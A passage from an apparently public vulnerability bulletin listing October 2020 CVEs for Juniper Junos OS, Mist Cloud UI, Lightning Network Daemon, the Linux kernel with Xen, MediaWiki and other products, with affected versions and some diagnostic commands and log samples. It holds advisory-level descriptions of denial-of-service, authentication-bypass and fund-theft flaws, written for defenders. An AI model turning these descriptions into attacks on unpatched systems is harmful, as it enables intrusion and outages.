In order to successfully exploit this vulnerability, the attacker needs to convince the device administrator to take action such as clicking the crafted URL sent via phishing email or convince the administrator to input data in the browser console. This issue affects Juniper Networks Junos OS: 18.1 versions prior to 18.1R3-S1; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1. 2020-10-16 not yet calculated CVE-2020-1673
CONFIRM
juniper_networks — junos_os
 
When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing “URL Filtering service”, may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This vulnerability might allow an attacker to cause an extended Denial of Service (DoS) attack against the device and to cause clients to be vulnerable to DNS based attacks by malicious DNS servers when they send DNS requests through the device. As a result, devices which were once protected by the DNS Filtering service are no longer protected and at risk of exploitation. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2. 2020-10-16 not yet calculated CVE-2020-1660
CONFIRM
juniper_networks — junos_os
 
An input validation vulnerability exists in Juniper Networks Junos OS, allowing an attacker to crash the srxpfe process, causing a Denial of Service (DoS) through the use of specific maintenance commands. The srxpfe process restarts automatically, but continuous execution of the commands could lead to an extended Denial of Service condition. This issue only affects the SRX1500, SRX4100, SRX4200, NFX150, NFX250, and vSRX-based platforms. No other products or platforms are affected by this vulnerability. This issue affects Juniper Networks Junos OS: 15.1X49 versions prior to 15.1X49-D220 on SRX1500, SRX4100, SRX4200, vSRX; 17.4 versions prior to 17.4R3-S3 on SRX1500, SRX4100, SRX4200, vSRX; 18.1 versions prior to 18.1R3-S11 on SRX1500, SRX4100, SRX4200, vSRX, NFX150; 18.2 versions prior to 18.2R3-S5 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.1 versions prior to 19.1R3-S2 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250; 19.2 versions prior to 19.2R1-S5, 19.2R3 on SRX1500, SRX4100, SRX4200, vSRX, NFX150, NFX250. This issue does not affect Junos OS 19.3 or any subsequent version. 2020-10-16 not yet calculated CVE-2020-1682
CONFIRM
juniper_networks — junos_os
 
Juniper Networks Junos OS and Junos OS Evolved fail to drop/discard delayed MACsec packets (e.g. delayed by more than 2 seconds). Per the specification, called the “bounded receive delay”, there should be no replies to delayed MACsec packets. Any MACsec traffic delayed more than 2 seconds should be dropped and late drop counters should increment. Without MACsec delay protection, an attacker could exploit the delay to spoof or decrypt packets. This issue affects: Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8, 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. Juniper Networks Junos OS Evolved: all versions prior to 19.4R3-EVO; 20.1 versions prior to 20.1R2-EVO. This issue does not affect Junos OS versions prior to 16.1R1. 2020-10-16 not yet calculated CVE-2020-1674
MISC
CONFIRM
MISC
juniper_networks — junos_os
 
The DHCPv6 Relay-Agent service, part of the Juniper Enhanced jdhcpd daemon shipped with Juniper Networks Junos OS has an Improper Input Validation vulnerability which will result in a Denial of Service (DoS) condition when a DHCPv6 client sends a specific DHCPv6 message allowing an attacker to potentially perform a Remote Code Execution (RCE) attack on the target device. Continuous receipt of the specific DHCPv6 client message will result in an extended Denial of Service (DoS) condition. If adjacent devices are also configured to relay DHCP packets, and are not affected by this issue and simply transparently forward unprocessed client DHCPv6 messages, then the attack vector can be a Network-based attack, instead of an Adjacent-device attack. No other DHCP services are affected. Receipt of the packet without configuration of the DHCPv6 Relay-Agent service, will not result in exploitability of this issue. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15; 12.3X48 versions prior to 12.3X48-D95; 14.1X53 versions prior to 14.1X53-D53; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D200; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R3-S3; 17.2X75 versions prior to 17.2X75-D44; 17.3 versions prior to 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R2-S6, 18.2R3-S2; 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1; 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2. 2020-10-16 not yet calculated CVE-2020-1656
CONFIRM
MISC
MISC
MISC
juniper_networks — junos_os
 
On Juniper Networks Junos OS platforms configured as DHCPv6 local server or DHCPv6 Relay Agent, the Juniper Networks Dynamic Host Configuration Protocol Daemon (JDHCPD) process might crash with a core dump if a malformed DHCPv6 packet is received, resulting in a restart of the daemon. This issue only affects DHCPv6; it does not affect DHCPv4. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.2 version 19.2R2 and later versions; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 17.4R1. 2020-10-16 not yet calculated CVE-2020-1671
CONFIRM
juniper_networks — junos_os
 
On Juniper Networks Junos OS devices configured as a DHCP forwarder, the Juniper Networks Dynamic Host Configuration Protocol Daemon (jdhcp) process might crash when receiving a malformed DHCP packet. This issue only affects devices configured as DHCP forwarder with forward-only option, that forward specified DHCP client packets, without creating a new subscriber session. The jdhcpd daemon automatically restarts without intervention, but continuous receipt of the malformed DHCP packet will repeatedly crash jdhcpd, leading to an extended Denial of Service (DoS) condition. This issue can be triggered only by DHCPv4, it cannot be triggered by DHCPv6. This issue affects Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S16; 12.3X48 versions prior to 12.3X48-D105 on SRX Series; 14.1X53 versions prior to 14.1X53-D60 on EX and QFX Series; 15.1 versions prior to 15.1R7-S7; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230 on SRX Series; 15.1X53 versions prior to 15.1X53-D593 on EX2300/EX3400; 16.1 versions prior to 16.1R7-S5. 2020-10-16 not yet calculated CVE-2020-1661
CONFIRM
juniper_networks — junos_os
 
On Juniper Networks Junos OS and Junos OS Evolved devices, BGP session flapping can lead to a routing process daemon (RPD) crash and restart, limiting the attack surface to configured BGP peers. This issue only affects devices with BGP damping in combination with accepted-prefix-limit configuration. When the issue occurs the following messages will appear in the /var/log/messages:
    rpd[6046]: %DAEMON-4-BGP_PREFIX_THRESH_EXCEEDED: XXXX (External AS x): Configured maximum accepted prefix-limit threshold(1800) exceeded for inet6-unicast nlri: 1984 (instance master)
    rpd[6046]: %DAEMON-3-BGP_CEASE_PREFIX_LIMIT_EXCEEDED: 2001:x:x:x::2 (External AS x): Shutting down peer due to exceeding configured maximum accepted prefix-limit(2000) for inet6-unicast nlri: 2001 (instance master)
    rpd[6046]: %DAEMON-4: bgp_rt_maxprefixes_check_common:9284: NOTIFICATION sent to 2001:x:x:x::2 (External AS x): code 6 (Cease) subcode 1 (Maximum Number of Prefixes Reached) AFI: 2 SAFI: 1 prefix limit 2000
    kernel: %KERN-5: mastership_relinquish_on_process_exit: RPD crashed on master RE. Sending SIGUSR2 to chassisd (5612:chassisd) to trigger RE switchover
This issue affects: Juniper Networks Junos OS: 17.2R3-S3; 17.3 version 17.3R3-S3 and later versions, prior to 17.3R3-S8; 17.4 version 17.4R2-S4, 17.4R3 and later versions, prior to 17.4R2-S10, 17.4R3-S2; 18.1 version 18.1R3-S6 and later versions, prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions, prior to 18.2R3-S4; 18.2X75 version 18.2X75-D50, 18.2X75-D60 and later versions, prior to 18.2X75-D53, 18.2X75-D65; 18.3 version 18.3R2 and later versions, prior to 18.3R2-S4, 18.3R3-S2; 18.4 version 18.4R2 and later versions, prior to 18.4R2-S5, 18.4R3-S2; 19.1 version 19.1R1 and later versions, prior to 19.1R2-S2, 19.1R3-S1; 19.2 version 19.2R1 and later versions, prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S2, 20.1R2.
Juniper Networks Junos OS Evolved prior to 20.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R3-S3. 2020-10-16 not yet calculated CVE-2020-1662
CONFIRM
juniper_networks — junos_os_and_junos_os_evolved
 
On Juniper Networks Junos OS and Junos OS Evolved platforms with EVPN configured, receipt of specific BGP packets causes a slow memory leak. If the memory is exhausted the rpd process might crash. If the issue occurs, the memory leak could be seen by executing the “show task memory detail | match policy | match evpn” command multiple times to check if memory (Alloc Blocks value) is increasing.
    root@device> show task memory detail | match policy | match evpn
    ------------------------ Allocator Memory Report ------------------------
    Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes
    Policy EVPN Params 20 24 3330678 79936272 3330678 79936272
    root@device> show task memory detail | match policy | match evpn
    ------------------------ Allocator Memory Report ------------------------
    Name | Size | Alloc DTXP Size | Alloc Blocks | Alloc Bytes | MaxAlloc Blocks | MaxAlloc Bytes
    Policy EVPN Params 20 24 36620255 878886120 36620255 878886120
This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R2; 20.1 versions prior to 20.1R1-S4, 20.1R2; Juniper Networks Junos OS Evolved: 19.4 versions; 20.1 versions prior to 20.1R1-S4-EVO, 20.1R2-EVO; 20.2 versions prior to 20.2R1-EVO; This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO. 2020-10-16 not yet calculated CVE-2020-1678
CONFIRM
juniper_networks — junos_os_devices
 
On Juniper Networks Junos OS devices, a specific SNMP OID poll causes a memory leak which over time leads to a kernel crash (vmcore). Prior to the kernel crash other processes might be impacted, such as failure to establish SSH connection to the device. The administrator can monitor the output of the following command to check if there is a memory leak caused by this issue:
  user@device> show system virtual-memory | match “pfe_ipc|kmem”
  pfe_ipc 147 5K – 164352 16,32,64,8192 <– increasing
  vm.kmem_map_free: 127246336 <– decreasing
  pfe_ipc 0 0K – 18598 32,8192
  vm.kmem_map_free: 134582272
This issue affects Juniper Networks Junos OS: 17.4R3; 18.1 version 18.1R3-S5 and later versions prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions prior to 18.2R3-S3; 18.2X75 version 18.2X75-D420, 18.2X75-D50 and later versions prior to 18.2X75-D430, 18.2X75-D53, 18.2X75-D60; 18.3 version 18.3R3 and later versions prior to 18.3R3-S2; 18.4 version 18.4R1-S4, 18.4R2 and later versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 version 19.1R2 and later versions prior to 19.1R2-S2, 19.1R3; 19.2 version 19.2R1 and later versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 17.4R3. 2020-10-16 not yet calculated CVE-2020-1683
CONFIRM
juniper_networks — junos_os_devices
 
On Juniper Networks Junos OS devices, receipt of a malformed IPv6 packet may cause the system to crash and restart (vmcore). This issue can be triggered by a malformed IPv6 packet destined to the Routing Engine or a transit packet that is sampled using sFlow/jFlow or processed by firewall filter with the syslog and/or log action. An attacker can repeatedly send the offending packet resulting in an extended Denial of Service condition. Only IPv6 packets can trigger this issue. IPv4 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 18.4R1. 2020-10-16 not yet calculated CVE-2020-1686
CONFIRM
juniper_networks — junos_os_devices
 
On SRX Series devices, a vulnerability in the key-management-daemon (kmd) daemon of Juniper Networks Junos OS allows an attacker to spoof packets targeted to IPSec peers before a security association (SA) is established thereby causing a failure to set up the IPSec channel. Sustained receipt of these spoofed packets can cause a sustained Denial of Service (DoS) condition. This issue affects IPv4 and IPv6 implementations. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D90; 15.1X49 versions prior to 15.1X49-D190; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S6, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2. This issue does not affect 12.3 or 15.1 releases which are non-SRX Series releases. 2020-10-16 not yet calculated CVE-2020-1657
CONFIRM
juniper_networks — mist_cloud_ui
 
When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle child elements in SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1677
CONFIRM
juniper_networks — mist_cloud_ui
 
When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1676
CONFIRM
juniper_networks — mist_cloud_ui
 
When Security Assertion Markup Language (SAML) authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly process invalid authentication certificates which could allow a malicious network-based user to access unauthorized data. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1675
CONFIRM
juniper_networks — multiple_devices
 
On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in an EVPN-VXLAN (Ethernet VPN-Virtual Extensible LAN) configuration, receipt of a stream of specific VXLAN encapsulated layer 2 frames can cause high CPU load, which could lead to network protocol operation issues and traffic interruption. This issue affects devices that are configured as a Layer 2 or Layer 3 gateway of an EVPN-VXLAN deployment. The offending layer 2 frames that cause the issue originate from a different access switch and get encapsulated within the same EVPN-VXLAN domain. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1687
CONFIRM
juniper_networks — multiple_devices
 
On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in a Virtual Chassis configuration, receipt of a stream of specific layer 2 frames can cause high CPU load, which could lead to traffic interruption. This issue does not occur when the device is deployed in Stand Alone configuration. The offending layer 2 frame packets can originate only from within the broadcast domain where the device is connected. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1689
CONFIRM
juniper_networks — mx_series_and_ex9200_series_devices
 
On Juniper Networks MX Series and EX9200 Series, in a certain condition the IPv6 Distributed Denial of Service (DDoS) protection might not take effect when it reaches the threshold condition. The DDoS protection allows the device to continue to function while it is under DDoS attack, protecting both the Routing Engine (RE) and the Flexible PIC Concentrator (FPC) during the DDoS attack. When this issue occurs, the RE and/or the FPC can become overwhelmed, which could disrupt network protocol operations and/or interrupt traffic. This issue does not affect IPv4 DDoS protection. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX series and EX9200 Series: 17.2 versions prior to 17.2R3-S4; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.2 versions prior to 18.2R2-S7, 18.2R3, 18.2R3-S3; 18.2X75 versions prior to 18.2X75-D30; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2. 2020-10-16 not yet calculated CVE-2020-1665
CONFIRM
MISC
juniper_networks — mx_series_devices
 
On Juniper Networks MX Series with MS-MIC or MS-MPC card configured with NAT64 configuration, receipt of a malformed IPv6 packet may crash the MS-PIC component on MS-MIC or MS-MPC. This issue occurs when a multiservice card is translating the malformed IPv6 packet to IPv4 packet. An unauthenticated attacker can continuously send crafted IPv6 packets through the device causing repetitive MS-PIC process crashes, resulting in an extended Denial of Service condition. This issue affects Juniper Networks Junos OS on MX Series: 15.1 versions prior to 15.1R7-S7; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D430, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2. 2020-10-16 not yet calculated CVE-2020-1680
CONFIRM
juniper_networks — nfx350_series_devices
 
The Juniper Device Manager (JDM) container, used by the disaggregated Junos OS architecture on Juniper Networks NFX350 Series devices, stores password hashes in the world-readable file /etc/passwd. This is not a security best current practice as it can allow an attacker with access to the local filesystem the ability to brute-force decrypt password hashes stored on the system. This issue affects Juniper Networks Junos OS on NFX350: 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1669
CONFIRM
juniper_networks — ptx/qfx_series_devices
 
On Juniper Networks PTX and QFX Series devices with packet sampling configured using tunnel-observation mpls-over-udp, sampling of a malformed packet can cause the Kernel Routing Table (KRT) queue to become stuck. KRT is the module within the Routing Process Daemon (RPD) that synchronizes the routing tables with the forwarding tables in the kernel. This table is then synchronized to the Packet Forwarding Engine (PFE) via the KRT queue. Thus, when the KRT queue becomes stuck, it can lead to unexpected packet forwarding issues. An administrator can monitor the following command to check if the KRT queue is stuck:
  user@device > show krt state
  …
  Number of async queue entries: 65007 <— this value keep on increasing.
When this issue occurs, the following message might appear in the /var/log/messages:
  DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Too many delayed route/nexthop unrefs. Op 2 err 55, rtsm_id 5:-1, msg type 2
  DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Memory usage of M_RTNEXTHOP type = (0) Max size possible for M_RTNEXTHOP type = (7297134592) Current delayed unref = (60000), Current unique delayed unref = (18420), Max delayed unref on this platform = (40000) Current delayed weight unref = (60000) Max delayed weight unref on this platform= (400000) curproc = rpd
This issue affects Juniper Networks Junos OS on PTX/QFX Series: 17.2X75 versions prior to 17.2X75-D105; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.2X75 versions prior to 18.2X75-D420, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1. 2020-10-16 not yet calculated CVE-2020-1679
CONFIRM
juniper_networks — qfx5k_series_devices
 
When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the discard action will fail to discard traffic under certain conditions. Given a firewall filter configuration similar to:
  family ethernet-switching {
      filter L2-VLAN {
          term ALLOW {
              from {
                  user-vlan-id 100;
              }
              then {
                  accept;
              }
          }
          term NON-MATCH {
              then {
                  discard;
              }
          }
      }
  }
when there is only one term containing a ‘user-vlan-id’ match condition, and no other terms in the firewall filter except discard, the discard action for non-matching traffic will only discard traffic with the same VLAN ID specified under ‘user-vlan-id’. Other traffic (e.g. VLAN ID 200) will not be discarded. This unexpected behavior can lead to unintended traffic passing through the interface where the firewall filter is applied. This issue only affects systems using VXLANs. This issue affects Juniper Networks Junos OS on QFX5K Series: 18.1 versions prior to 18.1R3-S7, except 18.1R3; 18.2 versions prior to 18.2R2-S7, 18.2R3-S1; 18.3 versions prior to 18.3R1-S5, 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S1, 18.4R3; 19.1 versions prior to 19.1R1-S5, 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2. 2020-10-16 not yet calculated CVE-2020-1685
CONFIRM
juniper_networks — srx_series_and_nfx_series_devices
 
On Juniper Networks SRX Series and NFX Series, a local authenticated user with access to the shell may obtain the Web API service private key that is used to provide encrypted communication between the Juniper device and the authenticator services. Exploitation of this vulnerability may allow an attacker to decrypt the communications between the Juniper device and the authenticator service. This Web API service is used for authentication services such as the Juniper Identity Management Service, used to obtain user identity for Integrated User Firewall feature, or the integrated ClearPass authentication and enforcement feature. This issue affects Juniper Networks Junos OS on Networks SRX Series and NFX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D190; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S4, 19.2R2. 2020-10-16 not yet calculated CVE-2020-1688
MISC
CONFIRM
MISC
MISC
MISC
juniper_networks — srx_series_devices
 
On Juniper Networks SRX Series configured with application identification inspection enabled, receipt of specific HTTP traffic can cause high CPU load utilization, which could lead to traffic interruption. Application identification is enabled by default and is automatically turned on when Intrusion Detection and Prevention (IDP), AppFW, AppQoS, or AppTrack is configured. Thus, this issue might occur when IDP, AppFW, AppQoS, or AppTrack is configured. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2. 2020-10-16 not yet calculated CVE-2020-1684
CONFIRM
levistudiou — release_build
 
An XXE vulnerability exists within LeviStudioU Release Build 2019-09-21 and prior when processing parameter entities, which may allow file disclosure. 2020-10-22 not yet calculated CVE-2020-25186
MISC

lightning_network_daemon — lightning_network_daemon

Prior to 0.11.0-beta, LND (Lightning Network Daemon) had a vulnerability in its invoice database. While claiming on-chain a received HTLC output, it didn’t verify that the corresponding outgoing off-chain HTLC was already settled before releasing the preimage. In the case of a hash-and-amount collision with an invoice, the preimage for an expected payment was instead released. A malicious peer could have deliberately intercepted an HTLC intended for the victim node, probed the preimage through a colluding relayed HTLC, and stolen the intercepted HTLC. The impact is a loss of funds in certain situations, and a weakening of the victim’s receiver privacy. 2020-10-21 not yet calculated CVE-2020-26896
MISC
MISC
MISC
lightning_network_daemon — lightning_network_daemon
 
Prior to 0.10.0-beta, LND (Lightning Network Daemon) would have accepted a counterparty high-S signature and broadcast tx-relay invalid local commitment/HTLC transactions. This can be exploited by any peer with an open channel regardless of the victim situation (e.g., routing node, payment-receiver, or payment-sender). The impact is a loss of funds in certain situations. 2020-10-21 not yet calculated CVE-2020-26895
MISC
MISC
MISC
linux — linux_kernel
 
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. drivers/xen/events/events_base.c allows event-channel removal during the event-handling loop (a race condition). This can cause a use-after-free or NULL pointer dereference, as demonstrated by a dom0 crash via events for an in-reconfiguration paravirtualized device, aka CID-073d0552ead5. 2020-10-22 not yet calculated CVE-2020-27675
MISC
MISC
MISC
linux — linux_kernel
 
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. Guest OS users can cause a denial of service (host OS hang) via a high rate of events to dom0, aka CID-e99502f76271. 2020-10-22 not yet calculated CVE-2020-27673
MISC
MISC
MISC
linux — linux_kernel
 
An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a. 2020-10-16 not yet calculated CVE-2020-27194
MISC
MISC
mark_text — mark_text
 
Mutation XSS exists in Mark Text through 0.16.2 that leads to Remote Code Execution. NOTE: this might be considered a duplicate of CVE-2020-26870; however, it can also be considered an issue in the design of the “source code mode” feature, which parses HTML even though HTML support is not one of the primary advertised roles of the product. 2020-10-16 not yet calculated CVE-2020-27176
MISC
mediawiki — mediawiki
 
The Cosmos Skin for MediaWiki through 1.35.0 has stored XSS because MediaWiki messages were not being properly escaped. This is related to wfMessage and Html::rawElement, as demonstrated by CosmosSocialProfile::getUserGroups. 2020-10-22 not yet calculated CVE-2020-27620
MISC
MISC
MISC
MISC
mediawiki — mediawiki
 
The FileImporter extension in MediaWiki through 1.35.0 was not properly attributing various user actions to a specific user’s IP address. Instead, for various actions, it would report the IP address of an internal Wikimedia Foundation server by omitting X-Forwarded-For data. This resulted in an inability to properly audit and attribute various user actions performed via the FileImporter extension. 2020-10-22 not yet calculated CVE-2020-27621
MISC
MISC
micro_focus — operation_bridge_manager
 
An arbitrary code execution vulnerability exists in Micro Focus Operation Bridge Manager 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions. The vulnerability could allow remote attackers to execute arbitrary code. 2020-10-22 not yet calculated CVE-2020-11853
MISC
microchip — cryptoauthlib
 
Microchip CryptoAuthentication Library CryptoAuthLib prior to 20191122 has a Buffer Overflow (issue 2 of 2). 2020-10-22 not yet calculated CVE-2019-16129
MLIST
MISC
MISC
microchip — cryptoauthlib
